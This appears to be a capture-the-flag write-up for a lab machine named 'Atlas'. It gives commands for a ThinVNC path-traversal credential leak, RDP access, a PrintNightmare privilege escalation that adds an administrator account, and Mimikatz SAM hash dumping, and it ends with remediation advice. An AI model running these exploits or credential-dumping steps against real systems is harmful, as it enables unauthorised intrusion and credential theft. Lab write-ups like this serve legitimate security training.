Target IP: atlas.thm (Requires /etc/hosts entry) Difficulty: Medium Objective: User & Root Flags

1. Executive Summary

“Atlas” is a Windows Server environment named GAIA. The primary vector involves exploiting an outdated ThinVNC instance (CVE-2019-17662) running on port 8080. This vulnerability allows unauthenticated arbitrary file reads, leaking plaintext credentials from the configuration file. Initial access is established via RDP using these credentials. Privilege escalation is achieved by exploiting the PrintNightmare vulnerability (CVE-2021-1675) in the Windows Print Spooler service to create a local administrator account.

Key TTPs (MITRE ATT&CK):

  • T1190 (Exploit Public-Facing App): Exploiting ThinVNC via Path Traversal.
  • T1552 (Unsecured Credentials): Reading plaintext passwords from ThinVNC.ini.
  • T1021 (Remote Services): Lateral movement from VNC to RDP.
  • T1068 (Exploitation for Privilege Escalation): PrintNightmare (Spooler Service).
  • T1003 (OS Credential Dumping): Using Mimikatz to dump SAM hashes.

2. Operational Setup

OpSec Note: “No tricks, just reality.” Always prepare your environment.

Host Configuration

# Map the target
echo "10.10.x.x atlas.thm" | sudo tee -a /etc/hosts

Workspace (Tmux)

  • Pane 1 (Recon): nmap, xfreerdp.
  • Pane 2 (Exploit): Serving files (python3 -m http.server), Exploit execution.
  • Pane 3 (Notes): Documentation.

3. Enumeration: “What do we see?”

A. Network Scanning

We start with a service version scan.

nmap -sC -sV -oA nmap/atlas atlas.thm

Analysis:

  • 3389/tcp (RDP): Microsoft Terminal Services.

  • Hostname: GAIA. (Useful for authentication contexts).

  • OS: Windows Server 2019 (Based on build 17763).

  • 8080/tcp (HTTP-Proxy):

  • Header: WWW-Authenticate: Digest realm="ThinVNC".

  • Context: ThinVNC is a web-based remote desktop solution. The banner specifically mentions “ThinVNC”.

B. Vulnerability Analysis (ThinVNC)

The Nmap scan reveals ThinVNC. A quick search (searchsploit ThinVNC) or Google search points to CVE-2019-17662.

The Vulnerability (Why it works): ThinVNC versions prior to a certain patch are vulnerable to Arbitrary File Read via Path Traversal. The server does not properly sanitize file paths in the URL, allowing us to traverse out of the web root and read local files. Even worse, ThinVNC stores credentials in ThinVNC.ini in the installation directory.


4. Initial Access: CVE-2019-17662

A. Manual Verification (The “No Script Kiddie” Way)

Before running a Python script from GitHub, let’s understand the request. The exploit targets the /downloads endpoint or similar unauthenticated paths to traverse back to the config file.

Discovery: The configuration file is typically located at C:\Program Files\ThinVNC\ThinVNC.ini.

Exploitation: We can likely read this file directly via the browser or curl. The exploit logic usually looks for: http://atlas.thm:8080/../../ThinVNC.ini (simplified).

However, using the published exploit script is efficient here if the traversal logic is complex.

B. Credential Extraction

Running the exploit script:

python3 cve-2019-17662.py http://atlas.thm:8080

Output (Example):

[Permissions]
AllowAnonymous=0
AllowDigest=1
...
[Users]
User1=admin
Pass1=s3cr3tP@ssw0rd!  <-- Plaintext!

Credentials Found:

  • User: admin (or similar from the output)
  • Password: [REDACTED]

C. The Switch (VNC -> RDP)

We could log in via the web browser on port 8080, but web-based VNC is laggy and has poor clipboard support. Since port 3389 is open, we assume these credentials are valid system credentials (or the user reused them).

Connect via xfreerdp:

# /v:Target /u:User /p:Password /dynamic-resolution +clipboard /drive:share,/tmp
xfreerdp /v:atlas.thm /u:admin /p:'s3cr3tP@ssw0rd!' /dynamic-resolution +clipboard /drive:share,/tmp
  • Note: We map our local /tmp directory to the remote machine using /drive:share,/tmp. This is crucial for transferring exploits (PrintNightmare) later without needing internet access on the target.

Status: We are in as a standard user.


5. Privilege Escalation: PrintNightmare (CVE-2021-1675)

Enumeration

Once inside via RDP:

  1. Open PowerShell.
  2. Check Privileges: whoami /priv (Standard user).
  3. Check OS Version: systeminfo | findstr /B /C:"OS Name" /C:"OS Version" (Server 2019).
  4. Check Services: Is the Print Spooler running?
Get-Service -Name Spooler

Result: Running.

The Vulnerability

PrintNightmare allows an authenticated user to remotely install a printer driver. By specifying a malicious driver (DLL) or manipulating the driver path, we can execute code as SYSTEM because the Spooler service runs with high privileges.

Exploitation (PowerShell Method)

We will use the PowerShell implementation (CVE-2021-1675.ps1 / Caleb Stewart’s version) which is cleaner than compiling a DLL.

  1. Transfer the Exploit: Since we mounted our drive in xfreerdp, we can access the script directly.
# Copy from our shared drive to a writable folder
copy \\tsclient\share\CVE-2021-1675.ps1 C:\Windows\Temp\privesc.ps1
  1. Import and Execute: We will force the Spooler to create a new local administrator account.
cd C:\Windows\Temp
Import-Module .\privesc.ps1
Invoke-Nightmare -NewUser "adm1n" -NewPassword "P@ssw0rd123!" -DriverName "Xerox"
  1. Verification:
net user adm1n

Result: Local Group Memberships *Administrators

Post-Exploitation (Looting)

Now we switch to our new Admin user to dump secrets.

  1. Start High-Integrity Shell: Right-click cmd.exe -> “Run as different user” -> adm1n : P@ssw0rd123!.
  2. Run Mimikatz: Transfer mimikatz.exe (using the RDP share again).
mimikatz.exe
# Inside Mimikatz:
privilege::debug
token::elevate
lsadump::sam

Result: You now have the NTLM hash of the built-in Administrator and any other users.


6. Remediation (Blue Team)

  1. Patch ThinVNC:
  • Update ThinVNC to the latest version immediately.
  • Configuration: Ensure configuration files (.ini) are not accessible via the web root and do not store passwords in plaintext.
  1. Disable Print Spooler:
  • On a Domain Controller or critical server, the Print Spooler service should be Disabled unless explicitly required for printing.
  • Command: Stop-Service Spooler -Force; Set-Service Spooler -StartupType Disabled.
  1. Patch Windows (PrintNightmare):
  • Apply the critical security updates from Microsoft (July 2021 onwards) that address CVE-2021-1675 and CVE-2021-34527.